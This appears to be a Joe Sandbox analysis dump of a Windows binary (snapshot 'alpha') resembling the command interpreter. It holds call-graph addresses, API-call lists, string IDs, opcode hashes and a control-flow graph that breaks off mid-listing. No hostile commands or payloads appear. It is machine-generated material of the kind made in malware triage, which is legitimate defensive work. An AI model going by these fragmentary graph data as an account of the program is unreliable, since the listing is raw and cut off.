7ff755cc9064 19011->19012 19013 7ff755cc9083 19012->19013 19014 7ff755cc906e 19012->19014 19017 7ff755cacd90 166 API calls 19013->19017 19015 7ff755cb498c 8 API calls 19014->19015 19016 7ff755cc9081 19015->19016 19016->18939 19018 7ff755cc909b 19017->19018 19018->19016 19019 7ff755cb498c 8 API calls 19018->19019 19020 7ff755cc90ec 19019->19020 19021 7ff755caff70 2 API calls 19020->19021 19021->19016 19023 7ff755cbed0a DeleteProcThreadAttributeList 19022->19023 19023->18928 19026 7ff755cb203b 19024->19026 19025 7ff755cb20b0 19028 7ff755cb3060 171 API calls 19025->19028 19030 7ff755cb211c 19025->19030 19026->19025 19027 7ff755cb2094 19026->19027 19029 7ff755cb20a6 19027->19029 19031 7ff755ca3278 166 API calls 19027->19031 19028->19030 19033 7ff755cb8f80 7 API calls 19029->19033 19030->19029 19032 7ff755cb2e44 2 API calls 19030->19032 19031->19029 19035 7ff755cb2148 19032->19035 19034 7ff755cb2325 19033->19034 19034->19002 19035->19029 19036 7ff755cb2d70 3 API calls 19035->19036 19037 7ff755cb21af 19036->19037 19038 7ff755cab900 166 API calls 19037->19038 19040 7ff755cb21d0 19038->19040 19039 7ff755cbe04a ??_V@YAXPEAX 19039->19029 19040->19039 19040->19040 19041 7ff755cb221c wcsspn 19040->19041 19050 7ff755cb22a4 ??_V@YAXPEAX 19040->19050 19043 7ff755cab900 166 API calls 19041->19043 19044 7ff755cb223b 19043->19044 19044->19039 19047 7ff755cb2252 19044->19047 19045 7ff755cb228f 19046 7ff755cad3f0 223 API calls 19045->19046 19046->19050 19047->19045 19048 7ff755cbe06d wcschr 19047->19048 19049 7ff755cbe090 towupper 19047->19049 19048->19047 19049->19045 19049->19047 19050->19029 19089 7ff755cad0f8 19051->19089 19100 7ff755cace5b 19051->19100 19052 7ff755cb8f80 7 API calls 19055 7ff755cad10a 19052->19055 19053 7ff755cbc860 19054 7ff755cbc97c 19053->19054 19159 7ff755ccee88 19053->19159 19058 7ff755cce9b4 197 API calls 19054->19058 19055->19002 19060 7ff755cbc981 longjmp 19058->19060 19063 7ff755cbc99a 19060->19063 19061 7ff755cbc882 EnterCriticalSection LeaveCriticalSection 19069 7ff755cad0e3 19061->19069 19062 7ff755cbc95c 19062->19054 19067 7ff755ca96b4 186 API calls 19062->19067 19066 7ff755cbc9b3 ??_V@YAXPEAX 19063->19066 19063->19089 19064 7ff755cacd90 166 API calls 19064->19100 19066->19089 19067->19062 19068 7ff755caceaa _tell 19070 7ff755cad208 _close 19068->19070 19069->19002 19070->19100 19071 7ff755cbc9d5 19072 7ff755ccd610 167 API calls 19071->19072 19074 7ff755cbc9da 19072->19074 19073 7ff755cab900 166 API calls 19073->19100 19075 7ff755cbca07 19074->19075 19077 7ff755ccbfec 176 API calls 19074->19077 19076 7ff755cce91c 198 API calls 19075->19076 19081 7ff755cbca0c 19076->19081 19078 7ff755cbc9f1 19077->19078 19080 7ff755ca3240 166 API calls 19078->19080 19079 7ff755cacf33 memset 19079->19100 19080->19075 19081->19002 19082 7ff755caca40 17 API calls 19082->19100 19083 7ff755cad184 wcschr 19083->19100 19084 7ff755ccbfec 176 API calls 19084->19100 19085 7ff755cbc9c9 19087 7ff755cb855c ??_V@YAXPEAX 19085->19087 19086 7ff755cad1a7 wcschr 19086->19100 19087->19089 19089->19052 19090 7ff755cb0a6c 273 API calls 19090->19100 19091 7ff755cabe00 635 API calls 19091->19100 19092 7ff755cb3448 166 API calls 19092->19100 19093 7ff755cb0580 12 API calls 19095 7ff755cad003 GetConsoleOutputCP GetCPInfo 19093->19095 19094 7ff755cacfab _wcsicmp 19094->19100 19096 7ff755cb04f4 3 API calls 19095->19096 19096->19100 19098 7ff755cb1fac 238 API calls 19098->19100 19099 7ff755cad044 ??_V@YAXPEAX 19099->19100 19100->19053 19100->19063 19100->19064 19100->19069 19100->19071 19100->19073 19100->19079 19100->19082 19100->19083 19100->19084 19100->19085 19100->19086 19100->19089 19100->19090 19100->19091 19100->19092 19100->19093 19100->19094 19100->19098 19100->19099 19126 7ff755cb0494 19100->19126 19139 7ff755cadf60 19100->19139 19195 7ff755cc778c 19100->19195 19226 7ff755ccc738 19100->19226 19102 7ff755cbb6e2 RevertToSelf CloseHandle 19101->19102 19103 7ff755ca96c8 19101->19103 19104 7ff755ca96ce 19103->19104 19105 7ff755ca6a48 184 API calls 19103->19105 19104->19002 19105->19103 19107 7ff755cb5a12 19106->19107 19108 7ff755cb596c 19106->19108 19107->19002 19108->19107 19109 7ff755cb598d VirtualQuery 19108->19109 19109->19107 19111 7ff755cb59ad 19109->19111 19110 7ff755cb59b7 VirtualQuery 19110->19107 19110->19111 19111->19107 19111->19110 19113 7ff755cce954 19112->19113 19114 7ff755cce990 19112->19114 19116 7ff755ccee88 390 API calls 19113->19116 19115 7ff755cce9b4 197 API calls 19114->19115 19117 7ff755cce995 longjmp 19115->19117 19118 7ff755cce964 19116->19118 19118->19114 19119 7ff755ca96b4 186 API calls 19118->19119 19119->19118 19124 7ff755cc76a3 19120->19124 19121 7ff755cc76b7 19123 7ff755cce9b4 197 API calls 19121->19123 19122 7ff755ca96b4 186 API calls 19122->19124 19125 7ff755cc76bc longjmp 19123->19125 19124->19121 19124->19122 19127 7ff755cb04a4 19126->19127 19128 7ff755cb26e0 19 API calls 19127->19128 19129 7ff755cb04b9 _get_osfhandle SetFilePointer 19127->19129 19130 7ff755cbd845 19127->19130 19132 7ff755cbd839 19127->19132 19134 7ff755ca3278 166 API calls 19127->19134 19128->19127 19129->19100 19131 7ff755ccf1d8 166 API calls 19130->19131 19133 7ff755cbd837 19131->19133 19135 7ff755ca3278 166 API calls 19132->19135 19136 7ff755cbd819 _getch 19134->19136 19135->19133 19136->19127 19137 7ff755cbd832 19136->19137 19236 7ff755ccbde4 EnterCriticalSection LeaveCriticalSection 19137->19236 19140 7ff755cadfe2 19139->19140 19141 7ff755cadf93 19139->19141 19143 7ff755cae100 VirtualFree 19140->19143 19144 7ff755cae00b _setjmp 19140->19144 19141->19140 19142 7ff755cadf9f GetProcessHeap RtlFreeHeap 19141->19142 19142->19140 19142->19141 19143->19140 19145 7ff755cae04a 19144->19145 19153 7ff755cae0c3 19144->19153 19146 7ff755cae600 473 API calls 19145->19146 19147 7ff755cae073 19146->19147 19148 7ff755cae081 19147->19148 19149 7ff755cae0e0 longjmp 19147->19149 19150 7ff755cad250 475 API calls 19148->19150 19152 7ff755cae0b0 19149->19152 19151 7ff755cae086 19150->19151 19151->19152 19156 7ff755cae600 473 API calls 19151->19156 19152->19153 19237 7ff755ccd3fc 19152->19237 19153->19068 19157 7ff755cae0a7 19156->19157 19157->19152 19158 7ff755ccd610 167 API calls 19157->19158 19158->19152 19160 7ff755cceed1 19159->19160 19161 7ff755cceefd 19159->19161 19285 7ff755ca7420 19160->19285 19299 7ff755cb885c FormatMessageW 19161->19299 19165 7ff755cb01b8 6 API calls 19166 7ff755cceee5 19165->19166 19167 7ff755cceeeb 19166->19167 19168 7ff755cceef8 19166->19168 19171 7ff755cad208 _close 19167->19171 19172 7ff755cad208 _close 19168->19172 19169 7ff755ccef41 LocalFree GetStdHandle GetConsoleMode 19175 7ff755ccefcf SetConsoleMode 19169->19175 19176 7ff755ccefe8 GetStdHandle GetConsoleMode 19169->19176 19170 7ff755ccef04 19170->19169 19173 7ff755ccef2f _wcsupr 19170->19173 19192 7ff755cceef0 19171->19192 19172->19161 19173->19169 19175->19176 19178 7ff755ccf015 SetConsoleMode 19176->19178 19181 7ff755ccf03c 19176->19181 19177 7ff755cb8f80 7 API calls 19179 7ff755cbc879 19177->19179 19178->19181 19179->19061 19179->19062 19180 7ff755ca3240 166 API calls 19180->19181 19181->19180 19182 7ff755cb01b8 6 API calls 19181->19182 19183 7ff755ccf07e GetStdHandle FlushConsoleInputBuffer 19181->19183 19184 7ff755ccf0a0 GetStdHandle 19181->19184 19185 7ff755ccf12d wcschr 19181->19185 19187 7ff755ccf161 19181->19187 19188 7ff755cb3448 166 API calls 19181->19188 19193 7ff755ccf0d7 towupper 19181->19193 19194 7ff755cb3448 166 API calls 19181->19194 19182->19181 19183->19181 19186 7ff755cc8450 367 API calls 19184->19186 19185->19181 19186->19181 19189 7ff755ccf166 SetConsoleMode 19187->19189 19190 7ff755ccf17a 19187->19190 19188->19185 19189->19190 19191 7ff755ccf17f SetConsoleMode 19190->19191 19190->19192 19191->19192 19192->19177 19193->19181 19194->19181 19223 7ff755cc77bc 19195->19223 19196 7ff755cc79ef 19196->19100 19197 7ff755cc7aca 19200 7ff755cb34a0 166 API calls 19197->19200 19198 7ff755cc79c0 19205 7ff755cb34a0 166 API calls 19198->19205 19202 7ff755cc7adb 19200->19202 19201 7ff755cc7ab5 19204 7ff755cb3448 166 API calls 19201->19204 19207 7ff755cc7af0 19202->19207 19211 7ff755cb3448 166 API calls 19202->19211 19203 7ff755cc7984 19203->19198 19209 7ff755cc7989 19203->19209 19204->19196 19210 7ff755cc79d6 19205->19210 19206 7ff755cc7a00 19206->19196 19214 7ff755cc7a0b 19206->19214 19222 7ff755cc7a33 19206->19222 19212 7ff755cc778c 166 API calls 19207->19212 19208 7ff755cb3448 166 API calls 19208->19223 19209->19196 19304 7ff755cc76e0 19209->19304 19213 7ff755cc79e7 19210->19213 19216 7ff755cb3448 166 API calls 19210->19216 19211->19207 19215 7ff755cc7afb 19212->19215 19300 7ff755cc7730 19213->19300 19214->19196 19219 7ff755cb34a0 166 API calls 19214->19219 19215->19209 19220 7ff755cb3448 166 API calls 19215->19220 19216->19213 19218 7ff755cb3448 166 API calls 19218->19196 19224 7ff755cc7a23 19219->19224 19220->19209 19221 7ff755cc778c 166 API calls 19221->19223 19222->19218 19223->19196 19223->19197 19223->19198 19223->19201 19223->19203 19223->19206 19223->19208 19223->19209 19223->19221 19225 7ff755cc778c 166 API calls 19224->19225 19225->19213 19227 7ff755ccc775 19226->19227 19232 7ff755ccc7ab 19226->19232 19228 7ff755cacd90 166 API calls 19227->19228 19230 7ff755ccc781 19228->19230 19229 7ff755ccc8d4 19229->19100 19230->19229 19231 7ff755cab0d8 194 API calls 19230->19231 19231->19229 19232->19229 19232->19230 19233 7ff755cab6b0 170 API calls 19232->19233 19234 7ff755cab038 _dup2 19232->19234 19235 7ff755cad208 _close 19232->19235 19233->19232 19234->19232 19235->19232 19252 7ff755ccd419 19237->19252 19238 7ff755cbcadf 19239 7ff755ccd576 19240 7ff755ccd592 19239->19240 19251 7ff755ccd555 19239->19251 19241 7ff755cb3448 166 API calls 19240->19241 19244 7ff755ccd5a5 19241->19244 19242 7ff755ccd5c4 19246 7ff755cb3448 166 API calls 19242->19246 19247 7ff755ccd5ba 19244->19247 19249 7ff755cb3448 166 API calls 19244->19249 19245 7ff755ccd541 19245->19240 19248 7ff755ccd546 19245->19248 19246->19238 19255 7ff755ccd36c 19247->19255 19248->19242 19248->19251 19249->19247 19262 7ff755ccd31c 19251->19262 19252->19238 19252->19239 19252->19240 19252->19242 19252->19245 19252->19251 19253 7ff755ccd3fc 166 API calls 19252->19253 19254 7ff755cb3448 166 API calls 19252->19254 19253->19252 19254->19252 19256 7ff755ccd381 19255->19256 19257 7ff755ccd3d8 19255->19257 19258 7ff755cb34a0 166 API calls 19256->19258 19261 7ff755ccd390 19258->19261 19259 7ff755cb3448 166 API calls 19259->19261 19260 7ff755cb34a0 166 API calls 19260->19261 19261->19257 19261->19259 19261->19260 19263 7ff755cb3448 166 API calls 19262->19263 19264 7ff755ccd33b 19263->19264 19265 7ff755ccd36c 166 API calls 19264->19265 19266 7ff755ccd343 19265->19266 19267 7ff755ccd3fc 166 API calls 19266->19267 19280 7ff755ccd34e 19267->19280 19268 7ff755ccd5c2 19268->19238 19269 7ff755ccd576 19270 7ff755ccd592 19269->19270 19283 7ff755ccd555 19269->19283 19271 7ff755cb3448 166 API calls 19270->19271 19274 7ff755ccd5a5 19271->19274 19272 7ff755ccd5c4 19276 7ff755cb3448 166 API calls 19272->19276 19273 7ff755ccd31c 166 API calls 19273->19268 19277 7ff755ccd5ba 19274->19277 19281 7ff755cb3448 166 API calls 19274->19281 19275 7ff755ccd541 19275->19270 19278 7ff755ccd546 19275->19278 19276->19268 19282 7ff755ccd36c 166 API calls 19277->19282 19278->19272 19278->19283 19279 7ff755cb3448 166 API calls 19279->19280 19280->19268 19280->19269 19280->19270 19280->19272 19280->19275 19280->19279 19280->19283 19284 7ff755ccd3fc 166 API calls 19280->19284 19281->19277 19282->19268 19283->19273 19284->19280 19286 7ff755ca745f 19285->19286 19287 7ff755ca7468 19285->19287 19286->19287 19288 7ff755ca7497 _wcsicmp 19286->19288 19289 7ff755cc48c8 _wcsicmp 19286->19289 19287->19161 19287->19165 19290 7ff755cb1ea0 8 API calls 19288->19290 19292 7ff755cc48ed CreateFileW 19289->19292 19291 7ff755ca74bd 19290->19291 19291->19292 19293 7ff755ca74c9 CreateFileW 19291->19293 19292->19293 19294 7ff755cc4929 19292->19294 19295 7ff755ca7501 _open_osfhandle 19293->19295 19296 7ff755cc4943 GetLastError 19293->19296 19294->19295 19295->19287 19297 7ff755ca7520 CloseHandle 19295->19297 19296->19287 19297->19287 19299->19170 19303 7ff755cc773c 19300->19303 19301 7ff755cc777d 19301->19196 19302 7ff755cb3448 166 API calls 19302->19303 19303->19301 19303->19302 19305 7ff755cc778c 166 API calls 19304->19305 19306 7ff755cc76fb 19305->19306 19307 7ff755cc771c 19306->19307 19308 7ff755cb3448 166 API calls 19306->19308 19307->19196 19309 7ff755cc7711 19308->19309 19310 7ff755cc778c 166 API calls 19309->19310 19310->19307 19312 7ff755cac486 19311->19312 19313 7ff755cac4c9 19311->19313 19314 7ff755cac48e wcschr 19312->19314 19318 7ff755cac161 19312->19318 19316 7ff755caff70 2 API calls 19313->19316 19313->19318 19315 7ff755cac4ef 19314->19315 19314->19318 19317 7ff755cacd90 166 API calls 19315->19317 19316->19318 19324 7ff755cac4f9 19317->19324 19318->18775 19318->18782 19319 7ff755cac5bd 19320 7ff755cac541 19319->19320 19323 7ff755cab6b0 170 API calls 19319->19323 19320->19318 19322 7ff755caff70 2 API calls 19320->19322 19321 7ff755cad840 178 API calls 19321->19324 19322->19318 19323->19320 19324->19318 19324->19319 19324->19320 19324->19321 19326 7ff755cab018 19325->19326 19326->18813 19327->18813 19329 7ff755cb3bcf 19328->19329 19330 7ff755cb3bfe 19328->19330 19329->19330 19331 7ff755cb3bdc wcschr 19329->19331 19330->18886 19331->19329 19331->19330 19333 7ff755cb2f2a 19332->19333 19334 7ff755cb2f97 19332->19334 19335 7ff755cb823c 10 API calls 19333->19335 19334->19333 19336 7ff755cb2f9c wcschr 19334->19336 19338 7ff755cb2f56 19335->19338 19337 7ff755cb2fb6 wcschr 19336->19337 19339 7ff755cb2f5a 19336->19339 19337->19333 19337->19339 19338->19339 19340 7ff755cb3a0c 2 API calls 19338->19340 19342 7ff755cb8f80 7 API calls 19339->19342 19345 7ff755cbe4ec 19339->19345 19341 7ff755cb2fe0 19340->19341 19341->19339 19343 7ff755cb2fe9 wcsrchr 19341->19343 19344 7ff755cb2f83 19342->19344 19343->19339 19344->18886 19347 7ff755cc4621 19346->19347 19348 7ff755ca72de 19346->19348 19349 7ff755cc47e0 19347->19349 19351 7ff755cc447b longjmp 19347->19351 19356 7ff755cc4639 19347->19356 19357 7ff755cc475e 19347->19357 19350 7ff755ca72eb 19348->19350 19354 7ff755cc4530 19348->19354 19355 7ff755cc4467 19348->19355 19352 7ff755ca7348 168 API calls 19349->19352 19407 7ff755ca7348 19350->19407 19358 7ff755cc4492 19351->19358 19406 7ff755cc4524 19352->19406 19364 7ff755ca7348 168 API calls 19354->19364 19355->19350 19355->19358 19369 7ff755cc4475 19355->19369 19361 7ff755cc4695 19356->19361 19362 7ff755cc463e 19356->19362 19370 7ff755ca7348 168 API calls 19357->19370 19363 7ff755ca7348 168 API calls 19358->19363 19360 7ff755ca7315 19422 7ff755ca73d4 19360->19422 19368 7ff755ca73d4 168 API calls 19361->19368 19362->19351 19372 7ff755cc4654 19362->19372 19376 7ff755cc44a8 19363->19376 19374 7ff755cc4549 19364->19374 19365 7ff755ca72b0 168 API calls 19371 7ff755cc480e 19365->19371 19366 7ff755ca7348 168 API calls 19366->19360 19393 7ff755cc469a 19368->19393 19369->19351 19369->19361 19370->19349 19371->18908 19378 7ff755ca7348 168 API calls 19372->19378 19373 7ff755cc45b2 19375 7ff755ca7348 168 API calls 19373->19375 19374->19373 19377 7ff755cc455e 19374->19377 19392 7ff755ca7348 168 API calls 19374->19392 19381 7ff755cc45c7 19375->19381 19385 7ff755ca7348 168 API calls 19376->19385 19388 7ff755cc44e2 19376->19388 19377->19373 19383 7ff755ca7348 168 API calls 19377->19383 19382 7ff755ca7323 19378->19382 19379 7ff755ca72b0 168 API calls 19387 7ff755cc4738 19379->19387 19380 7ff755cc46e1 19380->19379 19384 7ff755ca7348 168 API calls 19381->19384 19382->18908 19383->19373 19391 7ff755cc45db 19384->19391 19385->19388 19386 7ff755ca72b0 168 API calls 19389 7ff755cc44f1 19386->19389 19390 7ff755ca7348 168 API calls 19387->19390 19388->19386 19395 7ff755ca72b0 168 API calls 19389->19395 19390->19406 19394 7ff755ca7348 168 API calls 19391->19394 19392->19377 19393->19380 19398 7ff755cc46ea 19393->19398 19399 7ff755cc46c7 19393->19399 19396 7ff755cc45ec 19394->19396 19397 7ff755cc4503 19395->19397 19401 7ff755ca7348 168 API calls 19396->19401 19397->19382 19403 7ff755ca7348 168 API calls 19397->19403 19400 7ff755ca7348 168 API calls 19398->19400 19399->19380 19404 7ff755ca7348 168 API calls 19399->19404 19400->19380 19402 7ff755cc4600 19401->19402 19405 7ff755ca7348 168 API calls 19402->19405 19403->19406 19404->19380 19405->19406 19406->19365 19406->19382 19411 7ff755ca735d 19407->19411 19408 7ff755ca3278 166 API calls 19409 7ff755cc4820 longjmp 19408->19409 19410 7ff755cc4838 19409->19410 19412 7ff755ca3278 166 API calls 19410->19412 19411->19408 19411->19410 19411->19411 19421 7ff755ca73ab 19411->19421 19413 7ff755cc4844 longjmp 19412->19413 19414 7ff755cc485a 19413->19414 19415 7ff755ca7348 166 API calls 19414->19415 19416 7ff755cc487b 19415->19416 19417 7ff755ca7348 166 API calls 19416->19417 19418 7ff755cc48ad 19417->19418 19419 7ff755ca7348 166 API calls 19418->19419 19420 7ff755ca72ff 19419->19420 19420->19360 19420->19366 19423 7ff755ca7401 19422->19423 19424 7ff755cc485a 19422->19424 19423->19382 19425 7ff755ca7348 168 API calls 19424->19425 19426 7ff755cc487b 19425->19426 19427 7ff755ca7348 168 API calls 19426->19427 19428 7ff755cc48ad 19427->19428 19429 7ff755ca7348 168 API calls 19428->19429 19430 7ff755cc48be 19429->19430 19430->19382 16763 7ff755cb8d80 16764 7ff755cb8da4 16763->16764 16765 7ff755cb8dbf Sleep 16764->16765 16766 7ff755cb8db6 16764->16766 16765->16764 16767 7ff755cb8ddb _amsg_exit 16766->16767 16773 7ff755cb8de7 16766->16773 16767->16773 16768 7ff755cb8e56 _initterm 16770 7ff755cb8e73 _IsNonwritableInCurrentImage 16768->16770 16769 7ff755cb8e3c 16777 7ff755cb37d8 GetCurrentThreadId OpenThread 16770->16777 16773->16768 16773->16769 16773->16770 16810 7ff755cb04f4 16777->16810 16779 7ff755cb3839 HeapSetInformation RegOpenKeyExW 16780 7ff755cbe9f8 RegQueryValueExW RegCloseKey 16779->16780 16781 7ff755cb388d 16779->16781 16783 7ff755cbea41 GetThreadLocale 16780->16783 16782 7ff755cb5920 VirtualQuery VirtualQuery 16781->16782 16784 7ff755cb38ab GetConsoleOutputCP GetCPInfo 16782->16784 16797 7ff755cb3919 16783->16797 16784->16783 16785 7ff755cb38f1 memset 16784->16785 16785->16797 16786 7ff755cb4d5c 391 API calls 16786->16797 16787 7ff755ca3240 166 API calls 16787->16797 16788 7ff755cbeb27 _setjmp 16788->16797 16789 7ff755cb3948 _setjmp 16789->16797 16790 7ff755cc8530 370 API calls 16790->16797 16791 7ff755cb01b8 6 API calls 16791->16797 16792 7ff755cb4c1c 166 API calls 16792->16797 16793 7ff755cadf60 481 API calls 16793->16797 16794 7ff755cbeb71 _setmode 16794->16797 16795 7ff755cb86f0 182 API calls 16795->16797 16796 7ff755cb0580 12 API calls 16798 7ff755cb398b GetConsoleOutputCP GetCPInfo 16796->16798 16797->16780 16797->16786 16797->16787 16797->16788 16797->16789 16797->16790 16797->16791 16797->16792 16797->16793 16797->16794 16797->16795 16797->16796 16799 7ff755cb58e4 EnterCriticalSection LeaveCriticalSection 16797->16799 16801 7ff755cabe00 647 API calls 16797->16801 16802 7ff755cb58e4 EnterCriticalSection LeaveCriticalSection 16797->16802 16800 7ff755cb04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16798->16800 16799->16797 16800->16797 16801->16797 16803 7ff755cbebbe GetConsoleOutputCP GetCPInfo 16802->16803 16804 7ff755cb04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16803->16804 16805 7ff755cbebe6 16804->16805 16806 7ff755cabe00 647 API calls 16805->16806 16807 7ff755cb0580 12 API calls 16805->16807 16806->16805 16808 7ff755cbebfc GetConsoleOutputCP GetCPInfo 16807->16808 16809 7ff755cb04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16808->16809 16809->16797 16811 7ff755cb0504 16810->16811 16812 7ff755cb051e GetModuleHandleW 16811->16812 16813 7ff755cb054d GetProcAddress 16811->16813 16814 7ff755cb056c SetThreadLocale 16811->16814 16812->16811 16813->16811

                                      Executed Functions

                                      Function 00007FF755CB0A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                      • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                      • API String ID: 3305344409-4288247545
                                      • Opcode ID: 3a658cc38ab97f116ce8e8e87b4ee7862caa448d1090e4e356381fbb7e19e6af
                                      • Instruction ID: 6cbda1688d9998ecbbdeea0667299a279aa58d082313e39f66873e59abce8305
                                      • Opcode Fuzzy Hash: 3a658cc38ab97f116ce8e8e87b4ee7862caa448d1090e4e356381fbb7e19e6af
                                      • Instruction Fuzzy Hash: D742B6ABA0868385EF50AB1198542B9E7A0EF85FACFCC4234D95E477D5DF7CE9448320
                                      Function 00007FF755CAAA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 216 7ff755caaa54-7ff755caaa98 call 7ff755cacd90 219 7ff755cbbf5a-7ff755cbbf70 call 7ff755cb4c1c call 7ff755caff70 216->219 220 7ff755caaa9e 216->220 221 7ff755caaaa5-7ff755caaaa8 220->221 223 7ff755caacde-7ff755caad00 221->223 224 7ff755caaaae-7ff755caaac8 wcschr 221->224 229 7ff755caad06 223->229 224->223 226 7ff755caaace-7ff755caaae9 towlower 224->226 226->223 228 7ff755caaaef-7ff755caaaf3 226->228 231 7ff755caaaf9-7ff755caaafd 228->231 232 7ff755cbbeb7-7ff755cbbec4 call 7ff755cceaf0 228->232 233 7ff755caad0d-7ff755caad1f 229->233 235 7ff755cbbbcf 231->235 236 7ff755caab03-7ff755caab07 231->236 243 7ff755cbbec6-7ff755cbbed8 call 7ff755ca3240 232->243 244 7ff755cbbf43-7ff755cbbf59 call 7ff755cb4c1c 232->244 237 7ff755caad22-7ff755caad2a call 7ff755cb13e0 233->237 245 7ff755cbbbde 235->245 239 7ff755caab09-7ff755caab0d 236->239 240 7ff755caab7d-7ff755caab81 236->240 237->221 246 7ff755cbbe63 239->246 248 7ff755caab13-7ff755caab17 239->248 240->246 247 7ff755caab87-7ff755caab95 240->247 243->244 261 7ff755cbbeda-7ff755cbbee9 call 7ff755ca3240 243->261 244->219 256 7ff755cbbbea-7ff755cbbbec 245->256 259 7ff755cbbe72-7ff755cbbe88 call 7ff755ca3278 call 7ff755cb4c1c 246->259 252 7ff755caab98-7ff755caaba0 247->252 248->240 253 7ff755caab19-7ff755caab1d 248->253 252->252 257 7ff755caaba2-7ff755caabb3 call 7ff755cacd90 252->257 253->245 258 7ff755caab23-7ff755caab27 253->258 266 7ff755cbbbf8-7ff755cbbc01 256->266 257->219 272 7ff755caabb9-7ff755caabde call 7ff755cb13e0 call 7ff755cb33a8 257->272 258->256 263 7ff755caab2d-7ff755caab31 258->263 281 7ff755cbbe89-7ff755cbbe8c 259->281 276 7ff755cbbef3-7ff755cbbef9 261->276 277 7ff755cbbeeb-7ff755cbbef1 261->277 263->229 268 7ff755caab37-7ff755caab3b 263->268 266->233 268->266 269 7ff755caab41-7ff755caab45 268->269 273 7ff755cbbc06-7ff755cbbc2a call 7ff755cb13e0 269->273 274 7ff755caab4b-7ff755caab4f 269->274 305 7ff755caac75 272->305 306 7ff755caabe4-7ff755caabe7 272->306 298 7ff755cbbc5a-7ff755cbbc61 273->298 299 7ff755cbbc2c-7ff755cbbc4c _wcsnicmp 273->299 279 7ff755caad2f-7ff755caad33 274->279 280 7ff755caab55-7ff755caab78 call 7ff755cb13e0 274->280 276->244 282 7ff755cbbefb-7ff755cbbf0d call 7ff755ca3240 276->282 277->244 277->276 290 7ff755cbbc66-7ff755cbbc8a call 7ff755cb13e0 279->290 291 7ff755caad39-7ff755caad3d 279->291 280->221 286 7ff755cbbe92-7ff755cbbeaa call 7ff755ca3278 call 7ff755cb4c1c 281->286 287 7ff755caacbe 281->287 282->244 312 7ff755cbbf0f-7ff755cbbf21 call 7ff755ca3240 282->312 340 7ff755cbbeab-7ff755cbbeb6 call 7ff755cb4c1c 286->340 295 7ff755caacc0-7ff755caacc7 287->295 319 7ff755cbbcc4-7ff755cbbcdc 290->319 320 7ff755cbbc8c-7ff755cbbcaa _wcsnicmp 290->320 300 7ff755caad43-7ff755caad49 291->300 301 7ff755cbbcde-7ff755cbbd02 call 7ff755cb13e0 291->301 295->295 309 7ff755caacc9-7ff755caacda 295->309 307 7ff755cbbd31-7ff755cbbd4f _wcsnicmp 298->307 299->298 313 7ff755cbbc4e-7ff755cbbc55 299->313 303 7ff755caad4f-7ff755caad68 300->303 304 7ff755cbbd5e-7ff755cbbd65 300->304 329 7ff755cbbd04-7ff755cbbd24 _wcsnicmp 301->329 330 7ff755cbbd2a 301->330 316 7ff755caad6a 303->316 317 7ff755caad6d-7ff755caad70 303->317 304->303 314 7ff755cbbd6b-7ff755cbbd73 304->314 323 7ff755caac77-7ff755caac7f 305->323 306->287 318 7ff755caabed-7ff755caac0b call 7ff755cacd90 * 2 306->318 325 7ff755cbbbc2-7ff755cbbbca 307->325 326 7ff755cbbd55 307->326 309->223 312->244 343 7ff755cbbf23-7ff755cbbf35 call 7ff755ca3240 312->343 315 7ff755cbbbb3-7ff755cbbbb7 313->315 331 7ff755cbbe4a-7ff755cbbe5e 314->331 332 7ff755cbbd79-7ff755cbbd8b iswxdigit 314->332 333 7ff755cbbbba-7ff755cbbbbd call 7ff755cb13e0 315->333 316->317 317->237 318->340 358 7ff755caac11-7ff755caac14 318->358 319->307 320->319 327 7ff755cbbcac-7ff755cbbcbf 320->327 323->287 335 7ff755caac81-7ff755caac85 323->335 325->221 326->304 327->315 329->330 341 7ff755cbbbac 329->341 330->307 331->333 332->331 337 7ff755cbbd91-7ff755cbbda3 iswxdigit 332->337 333->325 342 7ff755caac88-7ff755caac8f 335->342 337->331 345 7ff755cbbda9-7ff755cbbdbb iswxdigit 337->345 340->232 341->315 342->342 347 7ff755caac91-7ff755caac94 342->347 343->244 355 7ff755cbbf37-7ff755cbbf3e call 7ff755ca3240 343->355 345->331 351 7ff755cbbdc1-7ff755cbbdd7 iswdigit 345->351 347->287 349 7ff755caac96-7ff755caacaa wcsrchr 347->349 349->287 354 7ff755caacac-7ff755caacb9 call 7ff755cb1300 349->354 356 7ff755cbbddf-7ff755cbbdeb towlower 351->356 357 7ff755cbbdd9-7ff755cbbddd 351->357 354->287 355->244 361 7ff755cbbdee-7ff755cbbe0f iswdigit 356->361 357->361 358->340 362 7ff755caac1a-7ff755caac33 memset 358->362 363 7ff755cbbe11-7ff755cbbe15 361->363 364 7ff755cbbe17-7ff755cbbe23 towlower 361->364 362->305 365 7ff755caac35-7ff755caac4b wcschr 362->365 366 7ff755cbbe26-7ff755cbbe45 call 7ff755cb13e0 363->366 364->366 365->305 367 7ff755caac4d-7ff755caac54 365->367 366->331 368 7ff755caad72-7ff755caad91 wcschr 367->368 369 